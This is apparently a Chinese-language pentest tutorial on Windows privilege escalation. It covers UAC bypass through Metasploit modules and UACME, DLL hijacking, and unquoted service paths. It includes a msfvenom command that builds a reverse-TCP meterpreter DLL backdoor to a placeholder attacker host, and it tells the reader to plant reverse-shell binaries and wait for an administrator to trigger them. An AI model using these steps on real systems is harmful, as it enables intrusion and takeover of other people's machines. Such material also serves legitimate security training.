一、演示案例-Win系统提权-本地管理用户-UAC绕过
win7之后的系统才会有UAC这个东西
msconfig
Win10-BypassUAC自动提权-MSF&UACME
为了远程执行目标的exe或者bat可执行文件需要绕过此安全机制
在用户到系统权限自动提权中也学通过BypassUAC实现自动化提权
绕过项目:MSF内置,Powershell渗透框架,UACME项目(推荐)
1、MSF绕过UAC常用模块
use exploit/windows/local/bypassua //针对旧版本的win7
use exploit/windows/local/bypassuac_sluihijack //针对新版本的win10/win11等
use exploit/windows/local/bypassuac_silentcleanup //针对新版本的win10/win11等
2、UACME项目
GitHub - hfiref0x/UACME: Defeating Windows User Account Control
Akagi64.exe 编号(1-78) 调用执行(x.exe)
二、演示案例-Win系统提权-本地普通用户/WEB权限-DLL劫持(被动等待)
Windows-DLL劫持提权应用配合MSF-FlashFXP
原理:Windows应用程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory,CWD
6、在PATH环境变量的目录(先系统后用户)
过程:信息收集-进程调试-制作dll并上传-替换dll-等待管理员启动应用成功
检测应用程序调用的dll
1、ChkDllHijack
GitHub - anhkgg/anhkgg-tools: Anhkgg's Tools
使用MSF生成dll后门文件并替换程序里调用的dll
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=xx -f dll -o xiaodi.dll
等待目标管理员启动应用成功上线后门
提前信息收集相关软件及DLL问题程序,本地调试成功后覆盖DLL实现利用
三、演示案例-Win系统提权-本地普通用户/WEB权限-未引号服务(被动等待)
Windows-不带引号服务路径配合MSF-MacroExpert
原理:服务路径配置由于目录空格问题,可上传文件配合解析恶意触发执行
过程:检测服务权限配置-制作文件并上传-服务路径指向解析-等待调用成功
检测命令:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
上传反弹exe,设置好对应执行名后等待管理员重启服务上线后门
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
